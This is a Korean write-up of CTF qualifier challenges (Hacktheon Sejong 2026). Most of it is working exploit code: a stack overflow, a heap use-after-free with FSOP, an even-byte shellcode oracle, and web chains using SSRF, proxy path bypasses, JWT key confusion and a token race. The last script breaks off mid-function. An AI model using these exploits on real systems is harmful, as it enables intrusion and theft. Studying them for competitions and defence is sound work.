Hacktheon Sejong 2026 Quals Writeup

Pwnable#

Immutable#

구조는 단순했다.

scanf("%s", buf)에서 길이 제한 없이 입력을 받는다.
입력 버퍼는 [rbp-0x90], 비교 변수는 [rbp-0x10]에 있다.
0x80 바이트를 채운 뒤 0xdeadbeef를 쓰면 비교 변수만 바뀐다.
canary는 [rbp-0x8]에 있으므로 건드리지 않는다.
조건문을 통과하면 바이너리 안의 system("/bin/sh")가 호출된다.

보호기법은 Full RELRO, Canary, NX, PIE가 모두 켜져 있었다. return address까지 덮을 필요는 없었다. canary 앞의 local variable만 바꾸면 된다.

스택 배치는 이렇게 잡힌다.

1
rbp-0x90 : input buffer
2
...
3
rbp-0x10 : check variable
4
rbp-0x08 : stack canary

payload는 바로 정해진다.

1
payload = b"A" * 0x80 + p32(0xdeadbeef)

payload를 보내면 shell이 뜬다. 거기서 플래그를 읽었다.

익스플로잇 코드

1
#!/usr/bin/env python3
2
from pwn import *
3

4

5
HOST = args.HOST or "3.37.44.62"
6
PORT = int(args.PORT or 33201)
7

8

9
def main():
10
    payload = b"A" * 0x80 + p32(0xDEADBEEF)
11

12
    io = remote(HOST, PORT)
13
    io.recvuntil(b"input: ")
14
    io.sendline(payload)
15
    io.sendline(b"cat flag; exit")
16
    print(io.recvall(timeout=3).decode("latin-1"), end="")
17

18

19
if __name__ == "__main__":
20
    main()

플래그: hacktheon2026{ed2190f6865ca1e3fea816b296445228064a51ec9492b518f514a60624f43d850738dd60b2c9d0893cb5c30f7d1efeaa575527f0b8534a96aa170356d2f8e2d0f3da4b43880faa71}

Old Days#

note manager로 구현된 heap 문제다. delete 이후 note pointer와 size를 초기화하지 않아서 UAF가 발생한다.

풀이 흐름은 이렇다.

freed large chunk를 read해서 main_arena 주소를 leak한다.
largebin chunk의 self pointer로 heap 주소를 구한다.
stdin pipe를 nonblocking으로 바꿔 slot에 잡히지 않는 live chunk를 만든다.
largebin attack으로 _IO_list_all을 fake FILE로 돌린다.
House of Apple 2 흐름에 맞춰 fake FILE chain을 구성한다.
stdin->_markers를 오염시켜 내부 SIGSEGV를 발생시킨다.
SIGSEGV handler가 exit(1)을 호출하고, exit flush에서 fake FILE이 실행된다.

먼저 UAF read로 leak을 잡았다. unsorted bin fd에서 libc base를 계산하고, largebin에 들어간 chunk의 fd_nextsize self pointer로 heap base를 구했다.

그다음은 안정적인 trigger였다. 원격에서는 바이너리가 setuid-root로 실행되고, 외부에서 signal을 보내는 방식은 사용할 수 없었다. 그래서 문제 내부의 SIGSEGV handler를 이용했다. handler는 특정 상태에서 exit(1)을 호출하므로, 프로세스 내부에서 SIGSEGV를 만들면 exit flush까지 도달할 수 있다.

FSOP는 _IO_list_all에 fake FILE을 연결하고, wide data/vtable을 House of Apple 2 흐름에 맞췄다. system("cat flag")가 호출되도록 구성했다.

마지막에 건드린 곳은 stdin->_markers였다. largebin attack으로 marker list를 잘못된 chunk로 돌려두면, 다음 입력 처리에서 stdin marker를 따라가다가 SIGSEGV가 발생한다. 이 SIGSEGV가 handler를 거쳐 exit(1)로 이어지고, exit flush에서 fake FILE chain이 실행된다.

전체 흐름은 이렇다.

1
UAF read
2
  -> libc leak / heap leak
3
  -> largebin attack(_IO_list_all)
4
  -> fake FILE chain
5
  -> largebin attack(stdin->_markers)
6
  -> scanf/getchar internal SIGSEGV
7
  -> exit flush
8
  -> system("cat flag")

익스플로잇 코드

1
#!/usr/bin/env python3
2
from pwn import *
3
import os, fcntl, select, time, sys
4

5
context.binary = exe = ELF('./deploy/prob', checksec=False)
6
libc = ELF('./libc.so.6', checksec=False)
7
ld = './ld-linux-x86-64.so.2'
8

9
class PipeProc:
10
    def __init__(self, argv):
11
        self.rin, self.win = os.pipe()
12
        self.rout, self.wout = os.pipe()
13
        self.buf = b''
14
        pid = os.fork()
15
        if pid == 0:
16
            os.dup2(self.rin, 0)
17
            os.dup2(self.wout, 1)
18
            os.dup2(self.wout, 2)
19
            for fd in (self.rin, self.win, self.rout, self.wout):
20
                try: os.close(fd)
21
                except OSError: pass
22
            os.execv(argv[0], argv)
23
        self.pid = pid
24
        os.close(self.wout)
25
        self.orig_flags = fcntl.fcntl(self.rin, fcntl.F_GETFL)
26

27
    def set_nb(self, enabled):
28
        flags = self.orig_flags | (os.O_NONBLOCK if enabled else 0)
29
        fcntl.fcntl(self.rin, fcntl.F_SETFL, flags)
30

31
    def send(self, data):
32
        os.write(self.win, data)
33

34
    def _read_some(self, timeout):
35
        r, _, _ = select.select([self.rout], [], [], timeout)
36
        if not r:
37
            return b''
38
        data = os.read(self.rout, 4096)
39
        if not data:
40
            raise EOFError(self.buf[-200:])
41
        self.buf += data
42
        return data
43

44
    def recvuntil(self, pat, timeout=5):
45
        end = time.time() + timeout
46
        while pat not in self.buf:
47
            left = end - time.time()
48
            if left <= 0:
49
                raise TimeoutError((pat, self.buf[-300:]))
50
            self._read_some(left)
51
        i = self.buf.index(pat) + len(pat)
52
        out = self.buf[:i]
53
        self.buf = self.buf[i:]
54
        return out
55

56
    def recvn(self, n, timeout=5):
57
        end = time.time() + timeout
58
        while len(self.buf) < n:
59
            left = end - time.time()
60
            if left <= 0:
61
                raise TimeoutError((n, self.buf[-300:]))
62
            self._read_some(left)
63
        out = self.buf[:n]
64
        self.buf = self.buf[n:]
65
        return out
66

67
    def recvall(self, timeout=5):
68
        out = self.buf
69
        self.buf = b''
70
        end = time.time() + timeout
71
        while True:
72
            left = max(0, end - time.time())
73
            if left == 0:
74
                break
75
            try:
76
                d = self._read_some(left)
77
                if d:
78
                    out += self.buf
79
                    self.buf = b''
80
            except EOFError:
81
                out += self.buf
82
                self.buf = b''
83
                break
84
        return out
85

86

87
def start():
88
    return PipeProc([ld, '--library-path', '.', './deploy/prob'])
89

90

91
def wait_prompt(p):
92
    p.recvuntil(b'Choice: ')
93

94

95
def menu(p, choice):
96
    p.send(str(choice).encode() + b'\n')
97

98

99
def create(p, idx, size, data=b'X'):
100
    menu(p, 1)
101
    p.recvuntil(b'Index')
102
    p.send(str(idx).encode() + b'\n')
103
    p.recvuntil(b'Size')
104
    p.send(str(size).encode() + b'\n')
105
    p.recvuntil(b'Content: ')
106
    p.send(data)
107
    wait_prompt(p)
108

109

110
def alloc_fail(p, idx, size):
111
    menu(p, 1)
112
    p.recvuntil(b'Index')
113
    p.send(str(idx).encode() + b'\n')
114
    p.recvuntil(b'Size')
115
    p.set_nb(True)
116
    p.send(str(size).encode() + b'\n')
117
    p.recvuntil(b'Content: ')
118
    p.recvuntil(b'Choice: ', timeout=2)
119
    p.set_nb(False)
120
    p.send(b'\n')
121
    wait_prompt(p)
122

123

124
def read_raw(p, idx, size):
125
    menu(p, 2)
126
    p.recvuntil(b'Index')
127
    p.send(str(idx).encode() + b'\n')
128
    p.recvuntil(f'Note[{idx}]: '.encode())
129
    data = p.recvn(size)
130
    p.recvuntil(b'Choice: ')
131
    return data
132

133

134
def edit(p, idx, data):
135
    menu(p, 3)
136
    p.recvuntil(b'Index')
137
    p.send(str(idx).encode() + b'\n')
138
    p.recvuntil(b'New content: ')
139
    p.send(data)
140
    wait_prompt(p)
141

142

143
def delete(p, idx):
144
    menu(p, 4)
145
    p.recvuntil(b'Index')
146
    p.send(str(idx).encode() + b'\n')
147
    wait_prompt(p)
148

149

150
def build_fake_file(p2_user, libc_base):
151
    payload = bytearray(0x418)
152
    fake2 = p2_user + 0x100
153
    wide = p2_user + 0x220
154
    wide_vtable = p2_user + 0x320
155
    lock = p2_user + 0x3D0
156

157
    def hfield(off, val):
158
        payload[off - 0x10:off - 0x08] = p64(val)
159

160
    hfield(0x20, 0)
161
    hfield(0x28, 0)
162
    hfield(0x68, fake2)
163
    hfield(0x88, lock)
164
    payload[0xC0 - 0x10:0xC0 - 0x0C] = p32(0)
165

166
    o = fake2 - p2_user
167
    cmd = b' cat flag;cat deploy/flag\x00'
168
    payload[o:o+len(cmd)] = cmd
169

170
    def ffield(off, val):
171
        payload[o + off:o + off + 8] = p64(val)
172

173
    ffield(0x20, 0)
174
    ffield(0x28, 1)
175
    ffield(0x68, 0)
176
    ffield(0x88, lock)
177
    ffield(0xA0, wide)
178
    payload[o + 0xC0:o + 0xC4] = p32(0)
179
    ffield(0xD8, libc_base + libc.sym['_IO_wfile_jumps'])
180
    payload[0x220 + 0xE0:0x220 + 0xE8] = p64(wide_vtable)
181
    payload[0x320 + 0x68:0x320 + 0x70] = p64(libc_base + libc.sym['system'])
182
    return bytes(payload)
183

184

185
def build_fake_file_with_largebin_meta(p2_user, libc_base, meta):
186
    payload = bytearray(build_fake_file(p2_user, libc_base))
187

188
    payload[0:0x20] = meta[:0x20]
189

190
    fake2 = p2_user + 0x100
191
    lock = p2_user + 0x3D0
192
    wide0 = p2_user + 0x3A0
193

194
    def hfield(off, val):
195
        payload[off - 0x10:off - 0x08] = p64(val)
196

197
    hfield(0x68, fake2)
198
    hfield(0x88, lock)
199
    hfield(0xA0, wide0)
200
    payload[0xC0 - 0x10:0xC0 - 0x0C] = p32(1)
201
    return bytes(payload)
202

203

204
def main():
205
    p = start()
206
    wait_prompt(p)
207

208
    create(p, 0, 0x468, b'A')
209
    alloc_fail(p, 6, 0x18)
210
    create(p, 1, 0x458, b'B')
211
    alloc_fail(p, 6, 0x18)
212
    create(p, 2, 0x448, b'C')
213
    alloc_fail(p, 6, 0x18)
214
    create(p, 3, 0x438, b'D')
215
    alloc_fail(p, 6, 0x18)
216

217
    delete(p, 0)
218
    libc_base = u64(read_raw(p, 0, 8)) - 0x203B20
219
    log.info(f'libc_base = {libc_base:#x}')
220

221
    alloc_fail(p, 6, 0x478)
222
    p1_meta = read_raw(p, 0, 0x20)
223
    p1_user = u64(p1_meta[0x10:0x18])
224
    if (p1_user & 0xf) == 0:
225
        p1_hdr = p1_user
226
        p1_user = p1_hdr + 0x10
227
    else:
228
        p1_hdr = p1_user - 0x10
229
    if p1_hdr == 0 or (p1_hdr >> 40) == 0:
230
        raise RuntimeError('bad p1 leak')
231
    p2_user = p1_user + 0x470 + 0x20
232
    log.info(f'p1_user = {p1_user:#x}, p2_user = {p2_user:#x}')
233

234
    delete(p, 1)
235
    meta = bytearray(read_raw(p, 0, 0x20))
236
    meta[0x18:0x20] = p64(libc_base + libc.sym['_IO_list_all'] - 0x20)
237
    edit(p, 0, bytes(meta))
238
    alloc_fail(p, 6, 0x478)
239

240
    p3_user = p2_user + 0x460 + 0x20
241
    p4_user = p3_user + 0x450 + 0x20
242
    log.info(f'p3_user ~= {p3_user:#x}')
243

244
    delete(p, 2)
245
    p4_hdr = p4_user - 0x10
246
    meta1 = bytearray(read_raw(p, 0, 0x20))
247
    meta1[0x18:0x20] = p64(p4_hdr - 0x20)
248
    edit(p, 0, bytes(meta1))
249
    alloc_fail(p, 6, 0x478)
250

251
    delete(p, 3)
252
    meta2 = read_raw(p, 1, 0x20)
253
    edit(p, 1, build_fake_file_with_largebin_meta(p2_user, libc_base, meta2))
254

255
    target2 = libc_base + libc.sym['_IO_2_1_stdin_'] + 0x60
256
    meta1 = bytearray(read_raw(p, 0, 0x20))
257
    meta1[0x18:0x20] = p64(target2 - 0x20)
258
    edit(p, 0, bytes(meta1))
259

260
    menu(p, 1)
261
    p.recvuntil(b'Index')
262
    p.send(b'6\n')
263
    p.recvuntil(b'Size')
264
    p.set_nb(True)
265
    p.send(b'1144\n')
266
    p.recvuntil(b'Content: ')
267
    p.recvuntil(b'Choice: ', timeout=2)
268
    p.set_nb(False)
269
    p.send(b'\n')
270
    for _ in range(32):
271
        p.send(b'1\n123456789012345678901234567890x\n')
272
        p.send(b'2\n123456789012345678901234567890x\n')
273
        p.send(b'3\n123456789012345678901234567890x\n')
274
        p.send(b'4\n123456789012345678901234567890x\n')
275
        p.send(b'123456789012345678901234567890x\n')
276
        time.sleep(0.02)
277
    out = p.recvall(timeout=5)
278
    sys.stdout.buffer.write(out)
279
    try:
280
        os.waitpid(p.pid, 0)
281
    except ChildProcessError:
282
        pass
283

284
if __name__ == '__main__':
285
    main()

플래그: hacktheon2026{o1d-d4y5_g1ibc_exp10it4ti0n}

even_made#

입력 shellcode의 모든 byte가 짝수여야 했다. 또한 seccomp가 nanosleep만 허용하므로, syscall로 플래그를 출력할 수 없었다.

플래그는 프로그램 시작 시 전역 변수 flag_mem에 올라간다. 출력 경로가 막혀 있었다. shellcode가 플래그 bit를 읽고 crash 종류로 bit 값을 알려주는 oracle을 만들었다.

구분은 이렇게 잡았다.

1
bit == 1 -> SIGTRAP
2
bit == 0 -> SIGSEGV

PIE base는 shellcode 호출 직후 stack에 남아 있는 return address에서 구했다. even-byte instruction만 써야 해서 사용할 수 있는 instruction은 제한적이었다. pop rax로 return address를 가져온 뒤 짝수 byte instruction 조합으로 flag_mem까지 offset을 더했다.

bit leak shellcode는 이런 모양이다.

1
code  = b"\x58"
2
code += add_even_delta
3
code += b"\x8a\x00"
4
code += test_bit
5
code += b"\x74\x02"
6
code += b"\xcc"
7
code += b"\xf4"

remote에서는 같은 bit를 여러 번 보내 crash 결과를 majority vote로 정했다. 이 과정을 0x50 바이트 정도 반복하면 null byte 전까지 플래그가 복구된다.

익스플로잇 코드

1
from pwn import *
2
import time
3

4
HOSTS = [
5
    ("13.124.201.116", 1337),
6
    ("54.181.1.133", 1337),
7
    ("43.201.41.138", 1337),
8
]
9

10
context.log_level = "error"
11

12
BASE_DELTA = 0x2aba
13

14

15
def add_delta_code(delta):
16
    low = delta & 0xff
17
    high = (delta >> 8) & 0xff
18

19
    code = b""
20

21
    code += b"\x3c\x02"
22
    code += b"\x10\xd2"
23

24
    code += b"\x80\x04\x24" + bytes([low & 0xfe])
25

26
    code += b"\x80\x14\x14" + bytes([high & 0xfe])
27
    code += b"\x10\x74\x24\x02"
28

29
    if low & 1:
30
        code += b"\x00\x14\x24"
31
        code += b"\x10\x34\x14"
32
        code += b"\x10\x74\x24\x02"
33

34
    if high & 1:
35
        code += b"\x00\x14\x14"
36
        code += b"\x10\x74\x24\x02"
37

38
    code += b"\x58"
39

40
    assert all((x & 1) == 0 for x in code)
41
    return code
42

43

44
def make_payload(delta, bit):
45
    code = add_delta_code(delta)
46

47
    code += b"\x8a\x00"
48

49
    if bit == 0:
50
        code += b"\xd0\xe0"
51
        code += b"\xa8\x02"
52
    else:
53
        code += b"\xa8" + bytes([1 << bit])
54

55
    code += b"\x74\x02"
56
    code += b"\xcc"
57
    code += b"\x50"
58
    code += b"\xf4"
59

60
    assert len(code) <= 0x900
61
    assert all((x & 1) == 0 for x in code)
62
    return code
63

64

65
def query(delta, bit, attempt=0):
66
    host, port = HOSTS[attempt % len(HOSTS)]
67
    payload = make_payload(delta, bit)
68

69
    io = remote(host, port, timeout=2)
70
    io.recvuntil(b"shellcode: ")
71
    io.send(payload)
72
    io.shutdown("send")
73
    out = io.recvall(timeout=2)
74
    io.close()
75

76
    if b"Trace/breakpoint" in out:
77
        return 1
78
    if b"Segmentation fault" in out or b"Alarm clock" in out:
79
        return 0
80

81
    raise RuntimeError(out)
82

83

84
def leak_bit(delta, bit):
85
    res = []
86

87
    for i in range(3):
88
        try:
89
            res.append(query(delta, bit, i))
90
        except Exception:
91
            time.sleep(0.05)
92

93
    if not res:
94
        return 0
95

96
    return 1 if sum(res) * 2 >= len(res) else 0
97

98

99
flag = b""
100

101
for i in range(0x50):
102
    v = 0
103

104
    for bit in range(8):
105
        v |= leak_bit(BASE_DELTA + i, bit) << bit
106

107
    if v == 0:
108
        break
109

110
    flag += bytes([v])
111
    print(flag)
112

113
print(flag.decode())

플래그: hacktheon2026{Ev3n_R3str1ct3d_Sh3lLc0d3_M4sT3r}

Reversing#

Brain Outside#

실제 코드는 바이너리 안에 없었다. client는 서버에서 stage를 받아 RWX mmap에 올린 뒤 바로 호출하는 loader다.

loader 동작은 이렇다.

1
read(sock, &len, 4);
2
buf = mmap(..., PROT_READ | PROT_WRITE | PROT_EXEC, ...);
3
read(sock, buf, len);
4
ret = ((uint64_t (*)())buf)();
5
send(sock, &ret, 8);

stage마다 decrypt stub이 달랐다. 8-byte XOR, cumulative add 후 XOR, NOT/pair swap 같은 변형이 반복됐다. stub을 패턴화해 body를 복호화했다.

처음에는 stage를 그대로 실행해 통과하려고 했다. 그런데 프로토콜은 단순했다. 서버는 stage 반환값만 받는다. 검증 코드를 실행하지 않아도 통과한 것처럼 ret 값을 보내며 다음 stage를 계속 받을 수 있다.

복호화된 stage 대부분은 flag.png의 특정 구간을 검증한다. 각 stage에서 세 값만 뽑으면 됐다.

1
file offset
2
length
3
expected bytes

이 값들을 빈 PNG에 계속 덮어썼다.

1
with open("flag_recovered.png", "r+b") as f:
2
    f.seek(fileoff)
3
    f.write(expected)

stage를 계속 모으니 gap이 사라졌다.

1
known 9193720 of 9193720
2
gaps 0 []

복원된 이미지는 아래와 같다.

Brain Outside recovered flag

플래그: hacktheon2026{90364e95eddf0fc1d5f54662d8e80913}

Recover It!#

검증 루틴은 짧다. 입력 길이가 64인지 확인하고, 각 byte에 i + 0x67을 XOR한 뒤 .data의 cmptable과 비교한다.

식은 이렇다.

1
encoded[i] = input[i] ^ (i + 0x67)
2
encoded[i] == cmptable[i]

XOR은 자기 자신이 역연산이라 정답은 바로 나온다.

1
input[i] = cmptable[i] ^ (i + 0x67)

cmptable은 .data의 0x4020에 있다.

1
cmptable = bytes.fromhex(
2
    "555a0a595f09555f5614434a43441114"
3
    "41484c1e421a191c1cb9e3e3bae5e7b1"
4
    "b6ecbfe8b2bdbabbeba6f3a1f1a4a4a0"
5
    "f4aca0f9ffa5a9a8ad94c7979791c695"
6
)
7

8
correct = bytes(c ^ ((i + 0x67) & 0xff) for i, c in enumerate(cmptable))

익스플로잇 코드

1
cmptable = bytes.fromhex(
2
    "555a0a595f09555f5614434a43441114"
3
    "41484c1e421a191c1cb9e3e3bae5e7b1"
4
    "b6ecbfe8b2bdbabbeba6f3a1f1a4a4a0"
5
    "f4aca0f9ffa5a9a8ad94c7979791c695"
6
)
7

8
correct_input = bytes(
9
    c ^ ((i + 0x67) & 0xff)
10
    for i, c in enumerate(cmptable)
11
)
12

13
print(correct_input.decode())
14
print(f"hacktheon2026{{{correct_input.decode()}}}")

플래그: hacktheon2026{22c34e819d2800db605d9fdbc9ba9ab71d6b3b016c49cd94624f545c3}

Until Executing#

OCaml native 바이너리다. stripped이지만 동적 심볼에 camlMain, camlProc_a_engine, camlProc_b_engine 등이 남아 있어서 구조를 잡을 수 있었다.

parent만 따라가면 검증 루틴이 잘 안 보인다. run_child가 fork()를 호출하고, 실제 verifier는 child process에서 실행된다.

입력은 이 조건을 만족해야 한다.

1
length   = 64
2
alphabet = abcdefghijklmnopqrstuvwxyz_0123456789!

OCaml immediate integer는 (n << 1) | 1 식으로 표현된다. 그래서 disassembly에서 길이 비교 값으로 보이는 0x81은 실제로 64다.

Proc_a_engine과 Proc_b_engine은 둘 다 explode -> run -> collapse 구조다. run에서 check closure를 쌓고, 마지막 collapse에서 실제 검증이 평가된다. 문제 제목도 이 지점을 가리킨다.

문자는 ASCII 그대로 쓰이지 않고 alphabet index의 tagged value로 바뀐다.

1
a -> 1
2
b -> 3
3
c -> 5
4
...

Proc_b의 current check와 state update를 Python으로 옮겨 candidate를 줄였다. branch가 빠르게 줄어들고, 끝에는 하나만 남았다. 그 candidate를 Proc_a checker에도 넣어 검증했다.

복구된 내부 문자열은 이렇다.

1
ovajumher0erwkl28_i8eecp!hb5enitsj6ly5hx05qel7a2z1gb6y8vi4fd4l93

플래그: hacktheon2026{ovajumher0erwkl28_i8eecp!hb5enitsj6ly5hx05qel7a2z1gb6y8vi4fd4l93}

Web#

Dark Harbor 1#

목표는 api-server가 생성하는 internal admin console이었다. 여기에는 플래그와 Phase 2에서 쓰는 deployment_hmac_secret이 들어 있었다.

첫 단계는 /build/fetch-artifact의 redirect SSRF였다. 처음 URL만 검사하고 redirect 이후 목적지는 다시 보지 않았다. 공개 redirector를 거쳐 api-server:6000/config를 읽으면 내부 routing 정보와 HMAC_SECRET이 나온다.

이 secret으로 api-server local JWT key를 만들었다.

1
LOCAL_JWT_KEY = HMAC-SHA256(HMAC_SECRET, "darkharbor-local-jwt").hexdigest()

이 key로 role=pipeline_admin, iss=darkharbor-local 토큰을 만들면 pipeline admin API를 사용할 수 있다.

그다음은 policy seed다. public key PEM을 JUnit report의 첫 번째 failure output에 넣어 업로드하면, policy engine이 그 PEM을 JWKS entry로 가져간다.

/internal/policy-seed는 edge proxy에서 막히지만, absolute-form request target과 percent-encoding을 섞으면 우회할 수 있다.

1
request target = http://api-server/%69nternal/policy-seed

edge proxy는 이를 /internal로 보지 못하고, Fastify는 decode 후 /internal/policy-seed route로 처리한다.

마지막은 fast-jwt 검증 차이다. policy engine은 seed된 PEM 앞에 audit banner로 개행을 붙인다.

1
key = "\n" + public_key_pem

이 값은 RSA public key로 인식되지 않고 HS256 secret처럼 쓰였다. 그래서 같은 값을 HMAC key로 사용해 role=admin policy token을 만들었다.

이 token으로 같은 request-target 우회를 써서 /internal/admin-console.json을 읽었다.

익스플로잇 코드

1
import base64
2
import hashlib
3
import hmac
4
import json
5
import subprocess
6
import time
7
from pathlib import Path
8

9
import requests
10

11
BASE = "http://15.164.173.78:8080"
12
WORKSPACE_ID = 559
13
WORKSPACE_TOKEN = "<workspace_token>"
14
HMAC_SECRET = "a]Kx9#mP$vQ2nR7wF4jL8cB5hT0yU3eA"
15
KID = "axii-kid-559"
16

17
def b64url(data: bytes) -> str:
18
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
19

20
def hs256(secret: bytes, header: dict, payload: dict) -> str:
21
    signing_input = (
22
        b64url(json.dumps(header, separators=(",", ":")).encode())
23
        + "."
24
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
25
    )
26
    sig = b64url(hmac.new(secret, signing_input.encode(), hashlib.sha256).digest())
27
    return signing_input + "." + sig
28

29
subprocess.run(["openssl", "genrsa", "-out", "/tmp/dh_rsa.pem", "2048"], check=True)
30
subprocess.run(["openssl", "rsa", "-in", "/tmp/dh_rsa.pem", "-pubout", "-out", "/tmp/dh_rsa_pub.pem"], check=True)
31
pub = Path("/tmp/dh_rsa_pub.pem").read_text()
32

33
xml = (
34
    '<?xml version="1.0"?>'
35
    '<testsuite name="seed"><testcase name="pem">'
36
    '<failure><![CDATA[' + pub + ']]></failure>'
37
    '</testcase></testsuite>'
38
)
39
r = requests.post(
40
    f"{BASE}/api/builds/{WORKSPACE_ID}/test-report",
41
    headers={
42
        "Authorization": f"Bearer {WORKSPACE_TOKEN}",
43
        "Content-Type": "application/xml",
44
    },
45
    data=xml,
46
)
47
r.raise_for_status()
48
report_id = r.json()["report_id"]
49

50
r = requests.post(
51
    BASE + "/",
52
    headers={
53
        "Authorization": f"Bearer {WORKSPACE_TOKEN}",
54
        "Content-Type": "application/json",
55
    },
56
    data=json.dumps({
57
        "workspace_id": WORKSPACE_ID,
58
        "report_id": report_id,
59
        "kid": KID,
60
    }),
61
)
62

63
now = int(time.time())
64
policy_token = hs256(
65
    ("\n" + pub).encode(),
66
    {"alg": "HS256", "typ": "JWT", "kid": KID},
67
    {"sub": "axii", "role": "admin", "iat": now, "exp": now + 600},
68
)
69

70
print("Use curl:")
71
print(
72
    "curl --request-target 'http://api-server/%69nternal/admin-console.json' "
73
    f"'{BASE}/' -H 'X-Policy-Token: {policy_token}'"
74
)

플래그: hacktheon2026{sil3nt_tid3_bre4ch}

Dark Harbor 2#

Dark Harbor 2는 Phase 1에서 얻은 deployment_hmac_secret으로 시작했다. /api/phase1-handoff에 secret을 보내면 REVIEW 상태의 workspace_id와 deploy API용 admin_jwt가 나온다.

플래그는 policy-engine의 /internal/admin/policy-override에서 암호화된다. 이 route는 internal 전용이고, JWT와 X-Internal-HMAC를 모두 확인한다. 인증값은 Phase 1에서 얻은 HMAC_SECRET으로 만들 수 있었다. 남은 문제는 internal route 접근이었다.

우회는 # 처리 차이에서 나왔다.

1
/internal/admin/policy-override#/../../../health/policy-engine

edge proxy는 #를 path 문자처럼 보고 path traversal 정규화를 한다. 결과적으로 /health/policy-engine으로 라우팅된다. 반면 FastAPI/Uvicorn은 # 뒤를 fragment처럼 보고 request.url.path에서 제외한다. 그래서 실제 handler는 /internal/admin/policy-override가 된다.

일반 URL에 #를 넣으면 클라이언트가 fragment를 서버로 보내지 않는다. raw HTTP나 curl --request-target이 필요했다.

override가 성공하면 deploy_token과 encrypted_secret이 나온다. 플래그는 아직 AES-GCM으로 암호화되어 있었다. session_seal과 signing_key가 필요했다.

deploy token 사용 로직은 Redis에서 token을 GET한 뒤 DEL한다. 두 동작은 원자적이지 않았다. 같은 token에 seal과 sign 요청을 동시에 보내면 둘 다 GET에 성공했다.

1
seal -> session_seal
2
sign -> signing_key

복호화 key는 이렇게 만들었다.

1
key = HMAC_SHA256(signing_key, session_seal)[:32]
2
nonce = encrypted_secret[:12]
3
flag = AESGCM(key).decrypt(nonce, encrypted_secret[12:], None)

익스플로잇 코드

1
import base64
2
import concurrent.futures
3
import hashlib
4
import hmac
5
import json
6
import socket
7
import threading
8
import time
9
from urllib import error as uerr
10
from urllib import request as ureq
11

12
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
13

14

15
HOST = "3.38.176.232"
16
PORT = 8080
17
BASE = f"http://{HOST}:{PORT}"
18
SECRET = "a]Kx9#mP$vQ2nR7wF4jL8cB5hT0yU3eA"
19

20

21
def b64url(data: bytes) -> str:
22
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
23

24

25
def b64json(obj) -> str:
26
    return b64url(json.dumps(obj, separators=(",", ":")).encode())
27

28

29
def api_json(path, method="GET", body=None, token=None):
30
    data = None
31
    headers = {"Content-Type": "application/json"}
32
    if body is not None:
33
        data = json.dumps(body, separators=(",", ":")).encode()
34
    if token:
35
        headers["Authorization"] = "Bearer " + token
36

37
    req = ureq.Request(BASE + path, data=data, headers=headers, method=method)
38
    try:
39
        with ureq.urlopen(req, timeout=8) as resp:
40
            return resp.status, json.loads(resp.read().decode())
41
    except uerr.HTTPError as e:
42
        try:
43
            return e.code, json.loads(e.read().decode())
44
        except Exception:
45
            return e.code, {"error": "http_error"}
46

47

48
def policy_jwt() -> str:
49
    header = {"alg": "HS256", "typ": "JWT"}
50
    payload = {
51
        "sub": "phase2-override",
52
        "role": "pipeline_admin",
53
        "exp": int(time.time()) + 600,
54
    }
55
    signing_input = b64json(header) + "." + b64json(payload)
56
    sig = hmac.new(SECRET.encode(), signing_input.encode(), hashlib.sha256).digest()
57
    return signing_input + "." + b64url(sig)
58

59

60
def raw_http(method, target, headers, body=b""):
61
    s = socket.create_connection((HOST, PORT), timeout=8)
62
    s.settimeout(8)
63

64
    lines = [
65
        f"{method} {target} HTTP/1.1",
66
        f"Host: {HOST}:{PORT}",
67
    ]
68
    for k, v in headers.items():
69
        lines.append(f"{k}: {v}")
70
    lines += [
71
        f"Content-Length: {len(body)}",
72
        "Connection: close",
73
        "",
74
        "",
75
    ]
76

77
    s.sendall("\r\n".join(lines).encode() + body)
78
    data = b""
79
    while True:
80
        chunk = s.recv(65536)
81
        if not chunk:
82
            break
83
        data += chunk
84
    s.close()
85

86
    raw_body = data.split(b"\r\n\r\n", 1)[1]
87
    return json.loads(raw_body.decode())
88

89

90
def call_override(workspace_id: int):
91
    body = json.dumps(
92
        {
93
            "workspace_id": workspace_id,
94
            "reason": "phase2 edge fragment routing bypass",
95
            "scope": "deploy",
96
            "target_state": "APPROVED",
97
        },
98
        separators=(",", ":"),
99
    ).encode()
100

101
    ts = str(int(time.time()))
102
    path = "/internal/admin/policy-override"
103
    msg = f"POST\n{path}\n{ts}\n{hashlib.sha256(body).hexdigest()}"
104
    x_hmac = "SHA256:" + ts + ":" + hmac.new(
105
        SECRET.encode(),
106
        msg.encode(),
107
        hashlib.sha256,
108
    ).hexdigest()
109

110
    return raw_http(
111
        "POST",
112
        "/internal/admin/policy-override#/../../../health/policy-engine",
113
        {
114
            "Authorization": "Bearer " + policy_jwt(),
115
            "X-Internal-HMAC": x_hmac,
116
            "X-Pipeline-State": "REVIEW",
117
            "Content-Type": "application/json",
118
        },
119
        body,
120
    )
121

122

123
def build_use_request(workspace_id, admin_jwt, deploy_token, action):
124
    body = json.dumps(
125
        {"token": deploy_token, "action": action},
126
        separators=(",", ":"),
127
    ).encode()
128

129
    return (
130
        "\r\n".join(
131
            [
132
                f"POST /api/deploy/{workspace_id}/use-token HTTP/1.1",
133
                f"Host: {HOST}:{PORT}",
134
                "Authorization: Bearer " + admin_jwt,
135
                "Content-Type: application/json",
136
                f"Content-Length: {len(body)}",
137
                "Connection: close",
138
                "",
139
                "",
140
            ]
141
        ).encode()
142
        + body
143
    )
144

145

146
def send_raw(raw):
147
    s = socket.create_connection((HOST, PORT), timeout=5)
148
    s.settimeout(5)
149
    s.sendall(raw)
150
    data = b""
151
    while True:
152
        chunk = s.recv(65536)
153
        if not chunk:
154
            break
155
        data += chunk
156
    s.close()
157

158
    raw_body = data.split(b"\r\n\r\n", 1)[1]
159
    return json.loads(raw_body.decode())
160

161

162
def race_use_token(workspace_id, admin_jwt, deploy_token):
163
    seal_req = build_use_request(workspace_id, admin_jwt, deploy_token, "seal")
164
    sign_req = build_use_request(workspace_id, admin_jwt, deploy_token, "sign")
165

166
    start = threading.Event()
167

168
    def worker(kind, raw):
169
        start.wait()
170
        return kind, send_raw(raw)
171

172
    futures = []
173
    with concurrent.futures.ThreadPoolExecutor(max_workers=40) as ex:
174
        for _ in range(20):
175
            futures.append(ex.submit(worker, "seal", seal_req))
176
            futures.append(ex.submit(worker, "sign", sign_req))
177

178
        start.set()
179

180
        session_seal = None
181
        signing_key = None
182
        for fut in concurrent.futures.as_completed(futures):
183
            kind, obj = fut.result()
184
